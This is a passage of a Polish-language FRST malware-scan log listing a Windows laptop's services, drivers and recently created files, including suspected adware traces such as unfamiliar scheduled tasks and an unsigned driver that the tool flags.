R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3634232 2016-06-15] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2522680 2016-06-15] (NVIDIA Corporation)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1104304 2016-11-15] (Intel Security, Inc.)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2016-12-07] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2016-12-07] ()
R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [440224 2016-03-11] (Acer Incorporated)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [481696 2016-03-11] (Acer Incorporated)
R2 SNARE; C:\Users\Emil\AppData\Local\SNARE\Snarer.dll [793600 2017-04-19] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 TrueKey; C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe [990656 2016-10-28] (McAfee, Inc.)
R2 TrueKeyScheduler; C:\Program Files\TrueKey\McTkSchedulerService.exe [16248 2016-10-28] (McAfee, Inc.)
S3 TrueKeyServiceHelper; C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe [86864 2016-10-28] (McAfee, Inc.)
R3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [291232 2016-02-01] (acer)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2017-03-28] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2017-03-28] (Microsoft Corporation)

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc.)
S1 cfywlan2; C:\WINDOWS\system32\DRIVERS\cfywlan2.sys [46088 2017-02-05] (Connectify)
S1 cnnctfy4; C:\WINDOWS\system32\DRIVERS\cnnctfy4.sys [53216 2017-02-05] (Connectify)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-11-25] (Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-11-25] (Disc Soft Ltd)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
S3 HipShieldK; C:\WINDOWS\System32\drivers\HipShieldK.sys [216704 2016-08-02] (McAfee, Inc.)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [21408 2016-03-11] (Acer Incorporated)
R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176584 2017-04-19] (Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-04-19] (Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-04-19] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251848 2017-04-19] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-04-19] (Malwarebytes)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc.)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85048 2016-11-18] (McAfee, Inc.)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc.)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvlddmkm.sys [14190520 2017-01-17] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28216 2016-06-15] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation)
R3 Qcamain10x64; C:\WINDOWS\System32\drivers\Qcamain10x64.sys [2336768 2016-07-16] (Qualcomm Atheros, Inc.)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [14752 2016-03-11] (Acer Incorporated)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek                                            )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [410880 2015-07-03] (Realsil Semiconductor Corporation)
R0 sptd2; C:\WINDOWS\System32\Drivers\sptd2.sys [203296 2017-04-19] (Duplex Secure Ltd)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [47784 2015-07-29] (Synaptics Incorporated)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U3 kwxyifow; C:\Users\Emil\AppData\Local\Temp\kwxyifow.sys [56584 2017-04-19] (GMER) [Brak podpisu cyfrowego] <==== UWAGA

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Jeden miesiąc - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-19 19:42 - 2017-04-19 19:43 - 00030972 _____ C:\Users\Emil\Downloads\FRST.txt
2017-04-19 19:41 - 2017-04-19 19:42 - 00000000 ____D C:\FRST
2017-04-19 19:40 - 2017-04-19 19:41 - 02424832 _____ (Farbar) C:\Users\Emil\Downloads\FRST64.exe
2017-04-19 19:34 - 2017-04-19 19:37 - 00380928 _____ C:\Users\Emil\Downloads\5ymv7ohx.exe
2017-04-19 19:31 - 2017-04-19 19:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2017-04-19 19:05 - 2017-04-19 19:05 - 00000000 ____D C:\Users\Emil\AppData\Local\Macromedia
2017-04-19 19:03 - 2017-04-19 19:03 - 00203296 _____ (Duplex Secure Ltd) C:\WINDOWS\system32\Drivers\sptd2.sys
2017-04-19 19:02 - 2017-04-19 19:03 - 00360696 _____ (Duplex Secure Ltd) C:\Users\Emil\Downloads\SPTD2inst-v212-x64.exe
2017-04-19 18:44 - 2017-04-19 19:30 - 00000000 ____D C:\Users\Emil\AppData\LocalLow\Mozilla
2017-04-19 18:43 - 2017-04-19 18:43 - 00000000 ____D C:\Users\Emil\PicStream
2017-04-19 18:39 - 2017-04-19 18:39 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-04-19 18:34 - 2017-04-19 18:34 - 00176584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-04-19 18:33 - 2017-04-19 19:37 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-04-19 18:33 - 2017-04-19 19:31 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-04-19 18:33 - 2017-04-19 19:31 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-04-19 18:33 - 2017-04-19 19:26 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-04-19 18:33 - 2017-04-19 18:33 - 00001916 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-19 18:33 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-04-19 18:29 - 2017-04-19 18:32 - 55566792 _____ (Malwarebytes ) C:\Users\Emil\Downloads\mb3-setup-consumer-3.0.6.1469.exe
2017-04-19 17:40 - 2017-04-19 17:40 - 00000000 ____D C:\Users\Emil\AppData\Local\3DM
2017-04-19 17:37 - 2017-04-19 17:37 - 00000000 _____ C:\WINDOWS\SysWOW64\1
2017-04-17 15:33 - 2017-04-17 15:33 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Firefox
2017-04-17 15:33 - 2017-04-17 15:33 - 00000000 ____D C:\Users\Emil\AppData\Local\Firefox
2017-04-17 15:31 - 2017-04-19 19:26 - 00000000 ____D C:\Users\Emil\AppData\Roaming\Elex-tech
2017-04-17 15:31 - 2017-04-19 19:26 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-17 15:31 - 2017-04-17 15:32 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-17 15:31 - 2017-04-17 15:31 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-04-17 15:31 - 2017-04-17 15:31 - 00002169 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-17 15:31 - 2017-04-17 15:31 - 00000000 ____D C:\WINDOWS\system32\log
2017-04-17 15:31 - 2017-04-17 15:31 - 00000000 ____D C:\ProgramData\Software
2017-04-17 15:28 - 2017-04-19 19:28 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 15:28 - 2017-04-19 17:43 - 00003674 _____ C:\WINDOWS\System32\Tasks\Milimili
2017-04-17 15:28 - 2017-04-19 17:43 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-17 15:28 - 2017-04-19 17:40 - 00000000 ____D C:\Users\Emil\AppData\Local\SNARE
2017-04-17 15:28 - 2017-04-19 17:33 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-17 15:28 - 2017-04-17 15:28 - 00000000 ____D C:\Users\Emil\AppData\Local\Kitty
2017-04-17 15:28 - 2017-04-17 15:28 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-14 19:36 - 2017-04-14 19:37 - 84719580 _____ C:\Users\Emil\Downloads\1_the_flying_farm.apk
2017-04-13 14:55 - 2017-04-13 14:56 - 00003686 _____ C:\WINDOWS\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:54 - 2017-04-13 14:54 - 00000000 ____D C:\Users\Emil\AppData\Roaming\SSMgre
2017-04-13 13:20 - 2017-04-13 13:20 - 00001260 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ustawienia aktualizacji i prywatności.lnk
2017-04-13 13:20 - 2017-04-13 13:20 - 00000000 ____D C:\Users\Emil\AppData\Local\UNP
2017-04-13 12:51 - 2017-04-13 12:52 - 00000000 ____D C:\Program Files\UNP
2017-04-13 12:51 - 2017-04-13 12:51 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-04-12 11:20 - 2017-03-28 07:41 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-04-12 11:20 - 2017-03-28 07:40 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XblAuthManagerProxy.dll
2017-04-12 11:20 - 2017-03-28 07:38 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XblAuthTokenBrokerExt.dll
2017-04-12 11:20 - 2017-03-28 07:36 - 00769024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ipsecsnp.dll
2017-04-12 11:20 - 2017-03-28 07:35 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2017-04-12 11:20 - 2017-03-28 07:34 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2017-04-12 11:20 - 2017-03-28 07:33 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ipsmsnap.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2017-04-12 11:20 - 2017-03-28 07:29 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-04-12 11:20 - 2017-03-28 07:17 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-04-12 11:20 - 2017-03-28 07:14 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2017-04-12 11:19 - 2017-03-28 09:10 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-04-12 11:19 - 2017-03-28 09:10 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-04-12 11:19 - 2017-03-28 08:21 - 00167848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll
2017-04-12 11:19 - 2017-03-28 08:19 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-04-12 11:19 - 2017-03-28 08:15 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00277344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-04-12 11:19 - 2017-03-28 08:04 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00116568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-04-12 11:19 - 2017-03-28 08:02 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-04-12 11:19 - 2017-03-28 08:02 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-04-12 11:19 - 2017-03-28 07:58 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-04-12 11:19 - 2017-03-28 07:58 - 00981888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-04-12 11:19 - 2017-03-28 07:53 - 01414728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-04-12 11:19 - 2017-03-28 07:53 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-04-12 11:19 - 2017-03-28 07:52 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-04-12 11:19 - 2017-03-28 07:42 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-04-12 11:19 - 2017-03-28 07:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-04-12 11:19 - 2017-03-28 07:40 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-04-12 11:19 - 2017-03-28 07:40 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-04-12 11:19 - 2017-03-28 07:39 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2017-04-12 11:19 - 2017-03-28 07:39 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-04-12 11:19 - 2017-03-28 07:38 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2017-04-12 11:19 - 2017-03-28 07:37 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apds.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.SystemManagement.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-04-12 11:19 - 2017-03-28 07:36 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicDisplay.sys
2017-04-12 11:19 - 2017-03-28 07:35 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-04-12 11:19 - 2017-03-28 07:35 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-04-12 11:19 - 2017-03-28 07:35 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00113152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Lights.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2017-04-12 11:19 - 2017-03-28 07:33 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-04-12 11:19 - 2017-03-28 07:33 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00271360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-04-12 11:19 - 2017-03-28 07:32 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00787968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sbe.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00529920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StructuredQuery.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-04-12 11:19 - 2017-03-28 07:27 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-04-12 11:19 - 2017-03-28 07:26 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2017-04-12 11:19 - 2017-03-28 07:26 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-04-12 11:19 - 2017-03-28 07:25 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2017-04-12 11:19 - 2017-03-28 07:25 - 01196544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2017-04-12 11:19 - 2017-03-28 07:24 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-04-12 11:19 - 2017-03-28 07:23 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-04-12 11:19 - 2017-03-28 07:23 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2017-04-12 11:19 - 2017-03-28 07:21 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00746496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcprx.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2017-04-12 11:19 - 2017-03-28 07:17 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-04-12 11:19 - 2017-03-28 07:17 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-04-12 11:19 - 2017-03-28 07:16 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-04-12 11:19 - 2017-03-28 07:16 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetails.dll
2017-04-12 11:19 - 2017-03-28 07:15 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-04-12 11:19 - 2017-03-28 07:14 - 00641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-04-12 11:19 - 2017-03-28 07:14 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-04-12 11:19 - 2017-03-28 07:13 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-04-12 11:19 - 2017-03-28 07:13 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
